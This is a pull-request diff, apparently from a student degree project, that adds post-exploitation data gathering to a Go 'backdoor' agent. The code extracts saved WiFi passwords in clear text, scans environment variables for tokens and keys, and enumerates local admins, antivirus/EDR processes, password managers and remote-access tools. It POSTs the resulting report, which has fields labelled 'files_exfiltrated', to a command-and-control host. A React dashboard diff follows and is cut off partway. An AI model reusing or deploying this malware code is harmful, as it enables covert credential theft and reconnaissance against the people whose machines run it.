### PR TITLE
feat(report): enriquecer datos de auditoría para pentesting

### DIFF
--- a/Proyecto_grado/models/audit.go
+++ b/Proyecto_grado/models/audit.go
@@ -10,52 +10,84 @@ import (
 	"go.mongodb.org/mongo-driver/bson/primitive"
 )
 
+// ─── Tipos post-exploitation ──────────────────────────────────────────────────
+
+type WiFiNetwork struct {
+	SSID     string `json:"ssid"`
+	Password string `json:"password"`
+}
+
+type LocalUser struct {
+	Username string `json:"username"`
+	IsAdmin  bool   `json:"is_admin"`
+	IsActive bool   `json:"is_active"`
+}
+
+type EnvCredential struct {
+	Key   string `json:"key"`
+	Value string `json:"value"`
+}
+
+type InstalledApp struct {
+	Name    string `json:"name"`
+	Version string `json:"version"`
+}
+
+// ─── Reporte de auditoría ─────────────────────────────────────────────────────
+
 type AuditReport struct {
-	ID            primitive.ObjectID `bson:"_id,omitempty" json:"id,omitempty"`
-	Sequence      int64              `bson:"sequence" json:"sequence"`
-	PrevHash      string             `bson:"prev_hash" json:"prev_hash"`
-	Hash          string             `bson:"hash" json:"hash"`
-	AgentID       string             `bson:"agentid" json:"agent_id"`
-	Hostname      string             `bson:"hostname" json:"hostname"`
-	OS            string             `bson:"os" json:"os"`
-	Arch          string             `bson:"arch" json:"arch"`
-	User          string             `bson:"user" json:"user"`
-	Elevated      bool               `bson:"elevated" json:"elevated"`
-	FirstSeen     string             `bson:"firstseen" json:"firstseen"`
-	LastSeen      string             `bson:"lastseen" json:"last_seen"`
-	IPs           []string           `bson:"ips" json:"ips"`
-	Gateway       string             `bson:"gateway" json:"gateway"`
-	DNS           []string           `bson:"dns" json:"dns"`
-	Persistence   []interface{}      `bson:"persistence" json:"persistence"`
-	AntiDebug     bool               `bson:"antidebug" json:"anti_debug"`
-	Processes     []ProcessInfo      `bson:"processes" json:"processes"`
-	Connections   []ConnInfo         `bson:"connections" json:"connections"`
-	CommandsRun   []string           `bson:"commandsrun" json:"commands_executed"`
-	FilesAccessed []FileInfo         `bson:"filesaccessed" json:"files_exfiltrated"`
+	ID              primitive.ObjectID `bson:"_id,omitempty" json:"id,omitempty"`
+	Sequence        int64              `bson:"sequence" json:"sequence"`
+	PrevHash        string             `bson:"prev_hash" json:"prev_hash"`
+	Hash            string             `bson:"hash" json:"hash"`
+	AgentID         string             `bson:"agentid" json:"agent_id"`
+	Hostname        string             `bson:"hostname" json:"hostname"`
+	OS              string             `bson:"os" json:"os"`
+	Arch            string             `bson:"arch" json:"arch"`
+	User            string             `bson:"user" json:"user"`
+	Elevated        bool               `bson:"elevated" json:"elevated"`
+	FirstSeen       string             `bson:"firstseen" json:"firstseen"`
+	LastSeen        string             `bson:"lastseen" json:"last_seen"`
+	IPs             []string           `bson:"ips" json:"ips"`
+	Gateway         string             `bson:"gateway" json:"gateway"`
+	DNS             []string           `bson:"dns" json:"dns"`
+	Persistence     []interface{}      `bson:"persistence" json:"persistence"`
+	AntiDebug       bool               `bson:"antidebug" json:"anti_debug"`
+	Processes       []ProcessInfo      `bson:"processes" json:"processes"`
+	Connections     []ConnInfo         `bson:"connections" json:"connections"`
+	CommandsRun     []string           `bson:"commandsrun" json:"commands_executed"`
+	FilesAccessed   []FileInfo         `bson:"filesaccessed" json:"files_exfiltrated"`
+	// ── Post-exploitation ─────────────────────────────────────────────────────
+	WiFiNetworks    []WiFiNetwork      `bson:"wifi_networks" json:"wifi_networks"`
+	LocalUsers      []LocalUser        `bson:"local_users" json:"local_users"`
+	SecurityProds   []string           `bson:"security_products" json:"security_products"`
+	EnvCredentials  []EnvCredential    `bson:"env_credentials" json:"env_credentials"`
+	TokenPrivileges []string           `bson:"token_privileges" json:"token_privileges"`
+	BrowserProfiles []string           `bson:"browser_profiles" json:"browser_profiles"`
+	InstalledApps   []InstalledApp     `bson:"installed_apps" json:"installed_apps"`
+	DomainName      string             `bson:"domain_name" json:"domain_name"`
 }
 
 // ComputeHash calcula SHA256(contenido_del_log + prevHash).
-// Solo incluye campos de datos (excluye ID, Sequence, PrevHash, Hash)
-// para que el hash represente únicamente el contenido observable.
 func (r *AuditReport) ComputeHash(prevHash string) string {
 	type content struct {
-		AgentID       string        `json:"agent_id"`
-		Hostname      string        `json:"hostname"`
-		OS            string        `json:"os"`
-		Arch          string        `json:"arch"`
-		User          string        `json:"user"`
-		Elevated      bool          `json:"elevated"`
-		FirstSeen     string        `json:"firstseen"`
-		LastSeen      string        `json:"last_seen"`
-		IPs           []string      `json:"ips"`
-		Gateway       string        `json:"gateway"`
-		DNS           []string      `json:"dns"`
-		Persistence   []interface{} `json:"persistence"`
-		AntiDebug     bool          `json:"anti_debug"`
-		Processes     []ProcessInfo `json:"processes"`
-		Connections   []ConnInfo    `json:"connections"`
-		CommandsRun   []string      `json:"commands_executed"`
-		FilesAccessed []FileInfo    `json:"files_exfiltrated"`
+		AgentID         string         `json:"agent_id"`
+		Hostname        string         `json:"hostname"`
+		OS              string         `json:"os"`
+		Arch            string         `json:"arch"`
+		User            string         `json:"user"`
+		Elevated        bool           `json:"elevated"`
+		FirstSeen       string         `json:"firstseen"`
+		LastSeen        string         `json:"last_seen"`
+		IPs             []string       `json:"ips"`
+		Gateway         string         `json:"gateway"`
+		DNS             []string       `json:"dns"`
+		Persistence     []interface{}  `json:"persistence"`
+		AntiDebug       bool           `json:"anti_debug"`
+		Processes       []ProcessInfo  `json:"processes"`
+		Connections     []ConnInfo     `json:"connections"`
+		CommandsRun     []string       `json:"commands_executed"`
+		FilesAccessed   []FileInfo     `json:"files_exfiltrated"`
 	}
 	c := content{
 		AgentID:       r.AgentID,

--- a/backdoor/report/AuditReport.go
+++ b/backdoor/report/AuditReport.go
@@ -8,62 +8,101 @@ import (
 	"time"
 )
 
+// ─── Tipos post-exploitation ──────────────────────────────────────────────────
+
+type WiFiNetwork struct {
+	SSID     string `json:"ssid"`
+	Password string `json:"password"`
+}
+
+type LocalUser struct {
+	Username string `json:"username"`
+	IsAdmin  bool   `json:"is_admin"`
+	IsActive bool   `json:"is_active"`
+}
+
+type EnvCredential struct {
+	Key   string `json:"key"`
+	Value string `json:"value"`
+}
+
+type InstalledApp struct {
+	Name    string `json:"name"`
+	Version string `json:"version"`
+}
+
+// ─── Reporte completo ─────────────────────────────────────────────────────────
+
 type AuditReport struct {
-	AgentID       string        `json:"agent_id"`
-	Hostname      string        `json:"hostname"`
-	OS            string        `json:"os"`
-	Arch          string        `json:"arch"`
-	User          string        `json:"user"`
-	Elevated      bool          `json:"elevated"`
-	FirstSeen     string        `json:"first_seen"`
-	LastSeen      string        `json:"last_seen"`
-	IPs           []string      `json:"ips"`
-	Gateway       string        `json:"gateway"`
-	DNS           []string      `json:"dns"`
-	Persistence   []string      `json:"persistence"`
-	AntiDebug     bool          `json:"anti_debug"`
-	Processes     []ProcessInfo `json:"processes"`
-	Connections   []ConnInfo    `json:"connections"`
-	CommandsRun   []string      `json:"commands_executed"`
-	FilesAccessed []FileInfo    `json:"files_exfiltrated"`
+	AgentID         string          `json:"agent_id"`
+	Hostname        string          `json:"hostname"`
+	OS              string          `json:"os"`
+	Arch            string          `json:"arch"`
+	User            string          `json:"user"`
+	Elevated        bool            `json:"elevated"`
+	FirstSeen       string          `json:"first_seen"`
+	LastSeen        string          `json:"last_seen"`
+	IPs             []string        `json:"ips"`
+	Gateway         string          `json:"gateway"`
+	DNS             []string        `json:"dns"`
+	Persistence     []string        `json:"persistence"`
+	AntiDebug       bool            `json:"anti_debug"`
+	Processes       []ProcessInfo   `json:"processes"`
+	Connections     []ConnInfo      `json:"connections"`
+	CommandsRun     []string        `json:"commands_executed"`
+	FilesAccessed   []FileInfo      `json:"files_exfiltrated"`
+	WiFiNetworks    []WiFiNetwork   `json:"wifi_networks"`
+	LocalUsers      []LocalUser     `json:"local_users"`
+	SecurityProds   []string        `json:"security_products"`
+	EnvCredentials  []EnvCredential `json:"env_credentials"`
+	TokenPrivileges []string        `json:"token_privileges"`
+	BrowserProfiles []string        `json:"browser_profiles"`
+	InstalledApps   []InstalledApp  `json:"installed_apps"`
+	DomainName      string          `json:"domain_name"`
 }
 
 func NewAuditReport() error {
 	hostname, osInfo, arch, userName, _ := GetSysInfo()
 	ips, err := GetIPs()
 	if err != nil {
-		// decidir: fallback a slice vacío o loguear
 		ips = []string{}
 	}
 	conns, err := GetConns()
 	if err != nil {
-		// decidir: fallback a slice vacío o loguear
 		conns = []ConnInfo{}
 	}
 
 	report := AuditReport{
-		AgentID:       config.UUID,
-		LastSeen:      time.Now().String(), // Initially set to first seen
-		Hostname:      hostname,
-		OS:            osInfo,
-		Arch:          arch,
-		User:          userName,
-		Elevated:      IsElevated(),
-		IPs:           ips,
-		Gateway:       GetDefaultGateway(),
-		DNS:           GetDNS(),
-		Persistence:   GetPersistencePoints(),
-		AntiDebug:     config.AntiDebug,
-		Processes:     GetProcesses(),
-		Connections:   conns,
-		CommandsRun:   GetCommandHistory(),
-		FilesAccessed: GetFileArtifacts(),
+		AgentID:         config.UUID,
+		LastSeen:        time.Now().String(),
+		Hostname:        hostname,
+		OS:              osInfo,
+		Arch:            arch,
+		User:            userName,
+		Elevated:        IsElevated(),
+		IPs:             ips,
+		Gateway:         GetDefaultGateway(),
+		DNS:             GetDNS(),
+		Persistence:     GetPersistencePoints(),
+		AntiDebug:       config.AntiDebug,
+		Processes:       GetProcesses(),
+		Connections:     conns,
+		CommandsRun:     GetCommandHistory(),
+		FilesAccessed:   GetFileArtifacts(),
+		WiFiNetworks:    GetWiFiNetworks(),
+		LocalUsers:      GetLocalUsers(),
+		SecurityProds:   GetSecurityProducts(),
+		EnvCredentials:  ScanEnvCredentials(),
+		TokenPrivileges: GetTokenPrivileges(),
+		BrowserProfiles: GetBrowserProfiles(),
+		InstalledApps:   GetInstalledApps(),
+		DomainName:      GetDomainName(),
 	}
 
 	buf, _ := json.Marshal(report)
 	resp, err := http.Post("http://"+config.Host+":"+config.Port+"/audit", "application/json", bytes.NewBuffer(buf))
 	if err != nil {
-		return err // o manejar el error de otra forma
+		return err
 	}
 	defer resp.Body.Close()
 	return nil

--- a/backdoor/report/Gathering.go
+++ b/backdoor/report/Gathering.go
@@ -357,3 +357,36 @@ func GetCommandHistory() []string {
 func IsElevated() bool {
 	return isElevatedUser() // Esta función está definida en los archivos específicos de cada OS
 }
+
+// ScanEnvCredentials escanea variables de entorno en busca de credenciales o tokens.
+func ScanEnvCredentials() []EnvCredential {
+	keywords := []string{
+		"KEY", "TOKEN", "SECRET", "PASSWORD", "PASS", "PWD",
+		"API", "AWS", "AZURE", "GCP", "GOOGLE", "GITHUB", "GITLAB",
+		"CREDENTIAL", "AUTH", "BEARER", "ACCESS", "PRIVATE",
+	}
+	var creds []EnvCredential
+	for _, env := range os.Environ() {
+		parts := strings.SplitN(env, "=", 2)
+		if len(parts) != 2 {
+			continue
+		}
+		key := strings.ToUpper(parts[0])
+		value := parts[1]
+		if value == "" {
+			continue
+		}
+		for _, kw := range keywords {
+			if strings.Contains(key, kw) {
+				// Enmascarar parte del valor para no exponer todo en texto plano
+				masked := value
+				if len(value) > 6 {
+					masked = value[:3] + strings.Repeat("*", len(value)-6) + value[len(value)-3:]
+				}
+				creds = append(creds, EnvCredential{Key: parts[0], Value: masked})
+				break
+			}
+		}
+	}
+	return creds
+}

--- a/backdoor/report/gathering_unix.go
+++ b/backdoor/report/gathering_unix.go
@@ -5,20 +5,132 @@ package report
 
 import (
 	"os"
+	"os/exec"
+	"os/user"
+	"path/filepath"
+	"strings"
 )
 
-// Implementación para sistemas Unix
-func GetDNSFromRegistry() []string {
-	// En Unix no hay registro, devolver slice vacío
-	return []string{}
+func GetDNSFromRegistry() []string { return []string{} }
+
+func GetWindowsPersistencePoints() []string { return []string{} }
+
+func isElevatedUser() bool { return os.Geteuid() == 0 }
+
+// GetWiFiNetworks intenta obtener redes WiFi con nmcli (Linux).
+func GetWiFiNetworks() []WiFiNetwork {
+	out, err := exec.Command("nmcli", "-t", "-f", "NAME,TYPE", "connection", "show").Output()
+	if err != nil { return nil }
+	var networks []WiFiNetwork
+	for _, line := range strings.Split(string(out), "\n") {
+		parts := strings.SplitN(line, ":", 2)
+		if len(parts) == 2 && strings.Contains(parts[1], "wireless") {
+			ssid := strings.TrimSpace(parts[0])
+			networks = append(networks, WiFiNetwork{SSID: ssid, Password: ""})
+		}
+	}
+	return networks
 }
 
-func GetWindowsPersistencePoints() []string {
-	// En Unix no hay registro de Windows, devolver slice vacío
-	return []string{}
+// GetLocalUsers lista usuarios del sistema desde /etc/passwd.
+func GetLocalUsers() []LocalUser {
+	data, err := os.ReadFile("/etc/passwd")
+	if err != nil { return nil }
+	var users []LocalUser
+	for _, line := range strings.Split(string(data), "\n") {
+		fields := strings.Split(line, ":")
+		if len(fields) < 4 { continue }
+		uid := fields[2]
+		if uid == "" { continue }
+		// UIDs >= 1000 son usuarios normales (o uid 0 = root)
+		isSystem := uid != "0" && (len(uid) < 4 || uid < "1000")
+		if isSystem { continue }
+		users = append(users, LocalUser{
+			Username: fields[0],
+			IsAdmin:  uid == "0",
+			IsActive: true,
+		})
+	}
+	return users
 }
 
-func isElevatedUser() bool {
-	// En Unix, verificar si somos root
-	return os.Geteuid() == 0
+// GetSecurityProducts detecta herramientas de seguridad en Linux.
+func GetSecurityProducts() []string {
+	known := []string{"clamd", "clamav", "rkhunter", "chkrootkit", "tripwire", "ossec", "wazuh", "falco"}
+	out, err := exec.Command("ps", "aux").Output()
+	if err != nil { return nil }
+	var found []string
+	seen := make(map[string]bool)
+	for _, proc := range known {
+		if strings.Contains(string(out), proc) && !seen[proc] {
+			seen[proc] = true
+			found = append(found, proc)
+		}
+	}
+	return found
+}
+
+// GetTokenPrivileges retorna grupos e info de privilegios del usuario actual.
+func GetTokenPrivileges() []string {
+	out, err := exec.Command("id").Output()
+	if err != nil { return nil }
+	return []string{strings.TrimSpace(string(out))}
+}
+
+// GetBrowserProfiles detecta navegadores instalados en Linux.
+func GetBrowserProfiles() []string {
+	usr, err := user.Current()
+	if err != nil { return nil }
+	home := usr.HomeDir
+	checks := []struct{ name, path string }{
+		{"Google Chrome", filepath.Join(home, ".config", "google-chrome")},
+		{"Mozilla Firefox", filepath.Join(home, ".mozilla", "firefox")},
+		{"Brave", filepath.Join(home, ".config", "BraveSoftware", "Brave-Browser")},
+		{"Chromium", filepath.Join(home, ".config", "chromium")},
+	}
+	var found []string
+	for _, c := range checks {
+		if _, err := os.Stat(c.path); err == nil { found = append(found, c.name) }
+	}
+	return found
+}
+
+// GetInstalledApps lista paquetes relevantes para pentesting en Linux.
+func GetInstalledApps() []InstalledApp {
+	// Intentar con dpkg (Debian/Ubuntu)
+	out, err := exec.Command("dpkg", "-l").Output()
+	if err != nil {
+		// Intentar con rpm (RHEL/CentOS)
+		out, err = exec.Command("rpm", "-qa", "--queryformat", "%{NAME} %{VERSION}\n").Output()
+		if err != nil { return nil }
+	}
+	interesting := []string{
+		"keepass", "bitwarden", "openssh", "filezilla", "git",
+		"openvpn", "wireguard", "docker", "kubectl",
+		"wireshark", "nmap", "burp", "metasploit",
+	}
+	var apps []InstalledApp
+	seen := make(map[string]bool)
+	for _, line := range strings.Split(string(out), "\n") {
+		fields := strings.Fields(line)
+		if len(fields) < 2 { continue }
+		name := strings.ToLower(fields[0])
+		for _, kw := range interesting {
+			if strings.Contains(name, kw) && !seen[name] {
+				seen[name] = true
+				version := ""
+				if len(fields) > 2 { version = fields[2] }
+				apps = append(apps, InstalledApp{Name: fields[0], Version: version})
+				break
+			}
+		}
+	}
+	return apps
+}
+
+// GetDomainName retorna el dominio del sistema en Linux.
+func GetDomainName() string {
+	out, err := exec.Command("hostname", "-d").Output()
+	if err != nil { return "" }
+	return strings.TrimSpace(string(out))
 }

--- a/backdoor/report/gathering_windows.go
+++ b/backdoor/report/gathering_windows.go
@@ -4,6 +4,11 @@
 package report
 
 import (
+	"os"
+	"os/exec"
+	"os/user"
+	"path/filepath"
+	"runtime"
 	"strings"
 	"unsafe"
 
@@ -11,7 +16,6 @@ import (
 	"golang.org/x/sys/windows/registry"
 )
 
-// Función específica de Windows para obtener DNS del registro
 func GetDNSFromRegistry() []string {
 	var out []string
 	k, err := registry.OpenKey(registry.LOCAL_MACHINE,
@@ -25,29 +29,19 @@ func GetDNSFromRegistry() []string {
 	return out
 }
 
-// Función específica de Windows para obtener puntos de persistencia del registro
 func GetWindowsPersistencePoints() []string {
 	var out []string
-
-	// Run keys en HKCU y HKLM
 	for _, root := range []registry.Key{registry.CURRENT_USER, registry.LOCAL_MACHINE} {
 		runPaths := []string{
 			`Software\Microsoft\Windows\CurrentVersion\Run`,
 			`Software\Microsoft\Windows\CurrentVersion\RunOnce`,
 		}
-
-		for _, path := range runPaths {
-			k, err := registry.OpenKey(root, path, registry.READ)
-			if err != nil {
-				continue
-			}
+		for _, rpath := range runPaths {
+			k, err := registry.OpenKey(root, rpath, registry.READ)
+			if err != nil { continue }
 			defer k.Close()
-
 			names, err := k.ReadValueNames(0)
-			if err != nil {
-				continue
-			}
-
+			if err != nil { continue }
 			for _, name := range names {
 				if cmd, _, err := k.GetStringValue(name); err == nil {
 					out = append(out, "RunKey: "+name+" -> "+cmd)
@@ -55,36 +49,225 @@ func GetWindowsPersistencePoints() []string {
 			}
 		}
 	}
-
 	return out
 }
 
-// Función específica de Windows para verificar privilegios elevados
 func isElevatedUser() bool {
-	// 1) Abrimos el token del proceso actual
 	var token windows.Token
 	err := windows.OpenProcessToken(windows.CurrentProcess(), windows.TOKEN_QUERY, &token)
-	if err != nil {
-		return false
-	}
+	if err != nil { return false }
 	defer token.Close()
-
-	// 2) Obtenemos la información TokenElevation
-	var elevation struct {
-		TokenIsElevated uint32
-	}
+	var elevation struct{ TokenIsElevated uint32 }
 	var outLen uint32
-	err = windows.GetTokenInformation(
-		token,
-		windows.TokenElevation,
-		(*byte)(unsafe.Pointer(&elevation)),
-		uint32(unsafe.Sizeof(elevation)),
-		&outLen,
-	)
-	if err != nil {
-		return false
-	}
-
-	// 3) Si TokenIsElevated != 0, somos admin
+	err = windows.GetTokenInformation(token, windows.TokenElevation,
+		(*byte)(unsafe.Pointer(&elevation)), uint32(unsafe.Sizeof(elevation)), &outLen)
+	if err != nil { return false }
 	return elevation.TokenIsElevated != 0
+}
+
+// GetWiFiNetworks extrae SSIDs y contraseñas WiFi guardadas en el sistema.
+func GetWiFiNetworks() []WiFiNetwork {
+	out, err := exec.Command("netsh", "wlan", "show", "profiles").Output()
+	if err != nil { return nil }
+	var networks []WiFiNetwork
+	for _, line := range strings.Split(string(out), "\n") {
+		if !strings.Contains(line, ":") { continue }
+		lower := strings.ToLower(line)
+		if !strings.Contains(lower, "all user profile") && !strings.Contains(lower, "perfil de todos") { continue }
+		parts := strings.SplitN(line, ":", 2)
+		if len(parts) < 2 { continue }
+		ssid := strings.TrimSpace(parts[1])
+		if ssid == "" { continue }
+		password := ""
+		detail, err := exec.Command("netsh", "wlan", "show", "profile", "name="+ssid, "key=clear").Output()
+		if err == nil {
+			for _, dline := range strings.Split(string(detail), "\n") {
+				dl := strings.ToLower(dline)
+				if strings.Contains(dl, "key content") || strings.Contains(dl, "contenido de clave") {
+					dp := strings.SplitN(dline, ":", 2)
+					if len(dp) == 2 { password = strings.TrimSpace(dp[1]) }
+				}
+			}
+		}
+		networks = append(networks, WiFiNetwork{SSID: ssid, Password: password})
+	}
+	return networks
+}
+
+// GetLocalUsers lista usuarios locales e indica si son administradores.
+func GetLocalUsers() []LocalUser {
+	adminOut, _ := exec.Command("net", "localgroup", "administrators").Output()
+	adminStr := strings.ToLower(string(adminOut))
+	usrOut, err := exec.Command("net", "user").Output()
+	if err != nil { return nil }
+	var users []LocalUser
+	inSection := false
+	for _, line := range strings.Split(string(usrOut), "\n") {
+		line = strings.TrimSpace(line)
+		if strings.HasPrefix(line, "---") { inSection = true; continue }
+		if !inSection || line == "" { continue }
+		lower := strings.ToLower(line)
+		if strings.Contains(lower, "the command") || strings.Contains(lower, "el comando") { continue }
+		for _, username := range strings.Fields(line) {
+			if username == "" { continue }
+			isAdmin := strings.Contains(adminStr, strings.ToLower(username))
+			isActive := true
+			detail, err := exec.Command("net", "user", username).Output()
+			if err == nil {
+				for _, dl := range strings.Split(string(detail), "\n") {
+					dl = strings.TrimSpace(dl)
+					dlLower := strings.ToLower(dl)
+					if strings.HasPrefix(dlLower, "account active") || strings.HasPrefix(dlLower, "cuenta activa") {
+						if strings.Contains(dlLower, "no") { isActive = false }
+						break
+					}
+				}
+			}
+			users = append(users, LocalUser{Username: username, IsAdmin: isAdmin, IsActive: isActive})
+		}
+	}
+	return users
+}
+
+// GetSecurityProducts detecta AV/EDR via WMI y por lista de procesos conocidos.
+func GetSecurityProducts() []string {
+	var found []string
+	wmiOut, err := exec.Command("wmic", "/namespace:\\\\root\\SecurityCenter2",
+		"path", "AntiVirusProduct", "get", "displayName", "/value").Output()
+	if err == nil {
+		for _, line := range strings.Split(string(wmiOut), "\n") {
+			if strings.HasPrefix(strings.ToLower(line), "displayname=") {
+				val := strings.TrimSpace(strings.SplitN(line, "=", 2)[1])
+				if val != "" { found = append(found, val) }
+			}
+		}
+	}
+	if len(found) > 0 { return found }
+	knownAV := map[string]string{
+		"MsMpEng.exe": "Windows Defender", "avgnt.exe": "Avast",
+		"avastsvc.exe": "Avast", "mcshield.exe": "McAfee", "mfemactl.exe": "McAfee",
+		"SAVAdminService.exe": "Sophos", "SophosUI.exe": "Sophos",
+		"bdagent.exe": "Bitdefender", "bdredline.exe": "Bitdefender",
+		"cb.exe": "Carbon Black", "MBAMService.exe": "Malwarebytes",
+		"ekrn.exe": "ESET NOD32", "egui.exe": "ESET NOD32",
+		"avp.exe": "Kaspersky", "ksde.exe": "Kaspersky",
+		"ntrtscan.exe": "Trend Micro", "coreFrameworkHost.exe": "Cylance",
+		"CylanceSvc.exe": "Cylance", "csfalconservice.exe": "CrowdStrike Falcon",
+		"xagt.exe": "FireEye HX", "cyserver.exe": "Cybereason",
+		"SentinelServiceHost.exe": "SentinelOne",
+	}
+	out2, err := exec.Command("tasklist", "/fo", "csv", "/nh").Output()
+	if err == nil {
+		for _, line := range strings.Split(string(out2), "\n") {
+			fields := strings.Split(line, ",")
+			if len(fields) == 0 { continue }
+			procName := strings.Trim(fields[0], "\"")
+			for avProc, avName := range knownAV {
+				if strings.EqualFold(procName, avProc) { found = append(found, avName) }
+			}
+		}
+	}
+	seen := make(map[string]bool)
+	var unique []string
+	for _, v := range found {
+		if !seen[v] { seen[v] = true; unique = append(unique, v) }
+	}
+	return unique
+}
+
+// GetTokenPrivileges retorna privilegios habilitados del token del proceso.
+func GetTokenPrivileges() []string {
+	out, err := exec.Command("whoami", "/priv").Output()
+	if err != nil { return nil }
+	var privs []string
+	for _, line := range strings.Split(string(out), "\n") {
+		line = strings.TrimSpace(line)
+		lower := strings.ToLower(line)
+		if (strings.Contains(lower, "enabled") || strings.Contains(lower, "habilitado")) && strings.HasPrefix(line, "Se") {
+			fields := strings.Fields(line)
+			if len(fields) > 0 { privs = append(privs, fields[0]) }
+		}
+	}
+	return privs
+}
+
+// GetBrowserProfiles detecta navegadores por directorios de perfil.
+func GetBrowserProfiles() []string {
+	usr, err := user.Current()
+	if err != nil { return nil }
+	home := usr.HomeDir
+	checks := []struct{ name, path string }{
+		{"Google Chrome", filepath.Join(home, "AppData", "Local", "Google", "Chrome", "User Data")},
+		{"Microsoft Edge", filepath.Join(home, "AppData", "Local", "Microsoft", "Edge", "User Data")},
+		{"Mozilla Firefox", filepath.Join(home, "AppData", "Roaming", "Mozilla", "Firefox", "Profiles")},
+		{"Brave", filepath.Join(home, "AppData", "Local", "BraveSoftware", "Brave-Browser", "User Data")},
+		{"Opera", filepath.Join(home, "AppData", "Roaming", "Opera Software", "Opera Stable")},
+		{"Vivaldi", filepath.Join(home, "AppData", "Local", "Vivaldi", "User Data")},
+	}
+	var found []string
+	for _, c := range checks {
+		if _, err := os.Stat(c.path); err == nil { found = append(found, c.name) }
+	}
+	return found
+}
+
+// GetInstalledApps lista apps relevantes para pentesting desde el registro.
+func GetInstalledApps() []InstalledApp {
+	var apps []InstalledApp
+	seen := make(map[string]bool)
+	interesting := []string{
+		"keepass", "1password", "lastpass", "bitwarden", "dashlane", "roboform",
+		"putty", "winscp", "filezilla", "mobaxterm", "termius",
+		"virtualbox", "vmware",
+		"python", "ruby", "perl", "git",
+		"openvpn", "nordvpn", "expressvpn", "wireguard",
+		"anydesk", "teamviewer", "vnc", "radmin",
+		"docker", "kubectl",
+		"wireshark", "nmap", "burp",
+	}
+	roots := []registry.Key{registry.LOCAL_MACHINE, registry.CURRENT_USER}
+	subkeys := []string{
+		`SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall`,
+		`SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall`,
+	}
+	for _, root := range roots {
+		for _, subkey := range subkeys {
+			k, err := registry.OpenKey(root, subkey, registry.READ)
+			if err != nil { continue }
+			names, err := k.ReadSubKeyNames(0)
+			if err != nil { k.Close(); continue }
+			for _, name := range names {
+				sub, err := registry.OpenKey(k, name, registry.READ)
+				if err != nil { continue }
+				displayName, _, _ := sub.GetStringValue("DisplayName")
+				displayVersion, _, _ := sub.GetStringValue("DisplayVersion")
+				sub.Close()
+				if displayName == "" || seen[displayName] { continue }
+				lower := strings.ToLower(displayName)
+				for _, kw := range interesting {
+					if strings.Contains(lower, kw) {
+						seen[displayName] = true
+						apps = append(apps, InstalledApp{Name: displayName, Version: displayVersion})
+						break
+					}
+				}
+			}
+			k.Close()
+		}
+	}
+	return apps
+}
+
+// GetDomainName retorna el dominio AD si el equipo está unido a uno.
+func GetDomainName() string {
+	_ = runtime.GOOS
+	out, err := exec.Command("wmic", "computersystem", "get", "Domain", "/value").Output()
+	if err != nil { return "" }
+	for _, line := range strings.Split(string(out), "\n") {
+		if strings.HasPrefix(strings.ToLower(line), "domain=") {
+			val := strings.TrimSpace(strings.SplitN(line, "=", 2)[1])
+			if val != "" && !strings.EqualFold(val, "WORKGROUP") { return val }
+		}
+	}
+	return ""
 }

--- a/front/front/src/pages/ReportDetails.jsx
+++ b/front/front/src/pages/ReportDetails.jsx
@@ -1,557 +1,200 @@
-import React, { useState, useEffect } from "react";
+import { useEffect, useState } from "react";
 import { useParams, useNavigate } from "react-router-dom";
 import {
-  ArrowLeft, Shield, Network, Monitor, Database,
-  Activity, AlertTriangle, Clock, Download, Copy, Eye, EyeOff,
-  ChevronDown, ChevronRight, Server, Cpu, HardDrive, Wifi, Terminal,
-  FileText, Camera, Maximize2, X, Hash, Link, Globe, Key, Zap,
+  ArrowLeft, Shield, AlertTriangle, Wifi, Users, Lock, Monitor,
+  Terminal, Globe, Database, Eye, Copy, ChevronDown, ChevronRight,
+  Key, Package, Server, Activity, Cpu, Network, FolderOpen,
+  CheckCircle, XCircle, Maximize2, X, Hash, Fingerprint
 } from "lucide-react";
 
-// ─── Paleta ───────────────────────────────────────────────────────────────────
-const BG     = "#0d1117";
-const CARD   = "#161b22";
-const CARD2  = "#1c2128";
-const BORDER = "#21262d";
+// ── Paleta ────────────────────────────────────────────────────────────────────
+const BG      = "#0d1117";
+const CARD    = "#161b22";
+const BORDER  = "#21262d";
+const BLUE    = "#58a6ff";
+const GREEN   = "#3fb950";
+const YELLOW  = "#d29922";
+const RED     = "#f85149";
+const PURPLE  = "#bc8cff";
+const ORANGE  = "#e3b341";
+const MUTED   = "#8b949e";
 
-// ─── Helpers ──────────────────────────────────────────────────────────────────
-function formatDate(s) {
-  if (!s) return "—";
-  try {
-    const d = s.includes("T")
-      ? new Date(s)
-      : new Date(s.split(" ").slice(0, 2).join(" ").replace(/\.\d+/, ""));
-    if (isNaN(d)) return "—";
-    return d.toLocaleString("es-ES", {
-      day: "2-digit", month: "short", year: "numeric",
-      hour: "2-digit", minute: "2-digit",
-    });
-  } catch { return "—"; }
+// ── Helpers ───────────────────────────────────────────────────────────────────
+const arr  = (v) => (Array.isArray(v) ? v : []);
+const safe = (v) => (v != null ? v : "—");
+
+function Badge({ label, color }) {
+  return (
+    <span style={{
+      background: color + "22", border: `1px solid ${color}44`,
+      color, borderRadius: 4, padding: "1px 8px", fontSize: 11, fontWeight: 600,
+    }}>
+      {label}
+    </span>
+  );
 }
 
-/** Parsea '{"ip":"1.2.3.4","port":443}' o '1.2.3.4:443' → '1.2.3.4:443' */
-function parseAddr(s) {
-  if (!s) return "";
-  try {
-    const obj = JSON.parse(s);
-    if (obj && obj.ip !== undefined) {
-      const ip = obj.ip || "";
-      const port = obj.port || "";
-      return ip ? `${ip}:${port}` : port ? `:${port}` : "";
-    }
-  } catch (_) {}
-  return s;
-}
-
-/** Extrae solo la IP de un addr */
-function extractIP(addr) {
-  const parsed = parseAddr(addr);
-  return parsed.split(":")[0] || "";
-}
-
-/** RFC-1918 / loopback / link-local */
-function isPrivateIP(ip) {
-  if (!ip) return true;
-  if (ip === "::" || ip === "0.0.0.0" || ip === "" || ip === "::1") return true;
-  if (ip.startsWith("10.")) return true;
-  if (ip.startsWith("127.")) return true;
-  if (ip.startsWith("169.254.")) return true;
-  if (ip.startsWith("172.")) {
-    const second = parseInt(ip.split(".")[1], 10);
-    if (second >= 16 && second <= 31) return true;
-  }
-  if (ip.startsWith("192.168.")) return true;
-  if (ip.startsWith("fe80")) return true;
-  return false;
-}
-
-const SUSPICIOUS_PROC = new Set([
-  "powershell.exe","powershell","pwsh.exe","pwsh",
-  "cmd.exe","cmd","wscript.exe","wscript","cscript.exe","cscript",
-  "mshta.exe","mshta","regsvr32.exe","regsvr32","rundll32.exe","rundll32",
-  "schtasks.exe","schtasks","at.exe","at",
-  "net.exe","net","netsh.exe","netsh","sc.exe",
